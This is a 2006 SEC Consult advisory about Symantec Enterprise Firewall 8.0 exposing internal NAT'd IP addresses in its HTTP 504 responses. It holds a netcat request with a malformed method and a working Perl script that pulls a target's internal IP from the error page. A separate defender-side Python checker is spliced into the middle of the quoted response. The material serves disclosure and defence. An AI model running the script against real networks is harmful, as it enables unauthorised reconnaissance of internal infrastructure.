SEC-20060512-0.txt

Date: 21 May 2006 00:00:00
Reported by: Bernhard Mueller
Type: packetstorm
Source: packetstormsecurity.com

Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure. A vulnerability in Symantec's Enterprise Firewall exposes internal IPs in response to certain HTTP requests, allowing external mapping


SEC Consult Security Advisory 20060512-0
==============================================================
title: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure
program: Symantec Enterprise FW  
vulnerable version: 8.0  
homepage: www.symantec.com  
found: 2005-09-13  
by: SEC Consult / www.sec-consult.com  
==============================================================  
  
Vendor description:  
---------------  
  
Symantec's Enterprise Firewall provides complete network protection by  
integrating smart application-level proxies, network circuits and packet  
filtering into a special perimeter-security architecture (...)  
  
  
Vulnerability overview:
---------------  
  
Enterprise FW leaks internal IPs of natted machines in response to  
certain HTTP requests.  
  
  
Vulnerability details:  
---------------  
  
A request of the form "get/XX HTTP/1.0" (note the missing space)
triggers the exposure. The firewall seems to forward the request and to
wait a certain time for a reply from the webserver, until the timeout is
reached. The final response from the firewall looks like:
  
df0rm@b4byl0n:~> netcat www.behind-raptor.com 80  
get/01 http/1.0  
HTTP/1.1 504 Gateway Timeout  
MIME-Version: 1.0  
Server: Simple, Secure Web Server 1.1  
Date: Tue, 13 Sep 2005 06:23:32 GMT  
Connection: close  
Content-Type: text/html  
  
[...]  
  
The request seen by the firewall was:  
<tt><ul><li>  
http://10.238.94.57/01  
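As an added example, not part of the advisory, here is a defender-side check in Python: it parses a captured response from a gateway and reports any private IPv4 address echoed in the error body, so a team can verify its own proxy's error pages (for instance after applying the patch). The sample response is constructed from the one quoted above; its body layout is an assumption.

```python
import ipaddress
import re

# Constructed sample modelled on the 504 response quoted in the advisory; the
# body layout (the <tt><ul><li> list holding the internal URL) is an assumption.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 504 Gateway Timeout\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Server: Simple, Secure Web Server 1.1\r\n"
    b"Date: Tue, 13 Sep 2005 06:23:32 GMT\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>The request seen by the firewall was:\n"
    b"<tt><ul><li>http://10.238.94.57/01</li></ul></tt></body></html>\n"
)

# Loose dotted-quad matcher; ipaddress validates each candidate afterwards.
IPV4_RE = re.compile(rb"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def parse_response(raw):
    """Split a raw HTTP response into (status line, header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers, body


def is_gateway_error(raw):
    """True for 502/504, the status the leaking error page is served with."""
    parts = parse_response(raw)[0].split()
    return len(parts) >= 2 and parts[1] in ("502", "504")


def leaked_private_ips(raw):
    """Non-routable IPv4 addresses (RFC 1918, loopback, link-local and similar)
    found in the body, deduplicated in order; an empty list means no leak."""
    body = parse_response(raw)[2]
    found = []
    for match in IPV4_RE.finditer(body):
        try:
            addr = ipaddress.IPv4Address(match.group(1).decode())
        except ValueError:  # e.g. 300.1.2.3 passed the loose regex
            continue
        if addr.is_private and str(addr) not in found:
            found.append(str(addr))
    return found
```

Run it over responses captured from your own gateway; a non-empty result on a 5xx error page means the proxy is still echoing the rewritten internal URL.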
  
  
  
Here's a simple script to map external to internal IPs.  
  
---------------  
  
#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot] com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use strict;
use warnings;
use IO::Socket;

$| = 1;    # unbuffered STDOUT so the "waiting" notice appears at once

my $host = $ARGV[0] or die "$0 <host>\n";

# method and path run together ("getXXX/XXX"); the missing space is what
# makes the proxy echo the rewritten internal URL in its 504 error page
my $request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
    PeerAddr => $host,
    PeerPort => 80,
    Proto    => 'tcp',
);

die "could not open socket: $!\n" unless $sock;

print $sock $request;

print "waiting for timeout (this can take about 1 min.)\n";

# the error body contains "http://<internal ip>XXX/XXX"; pick out the address
my $ip;
while (<$sock>) {
    if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
        $ip = $1;
    }
}

if (defined($ip)) {
    print "$host: $ip\n";
} else {
    print "failed.\n";
}

close($sock);
  
  
vendor status:  
---------------  
vendor notified: 2005-09-13  
vendor response: 2005-09-13  
patch available: 2005-12  
  
  
General remarks  
---------------  
We would like to apologize in advance for potential nonconformities  
and/or known issues.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Blindengasse 3  
A-1080 Wien  
Austria  
  
Tel.: +43 / 1 / 409 0307 - 570  
Fax.: +43 / 1 / 409 0307 - 590  
Mail: office at sec-consult dot com  
www.sec-consult.com  
  
EOF SEC Consult / @2006  
research at sec-consult dot com  
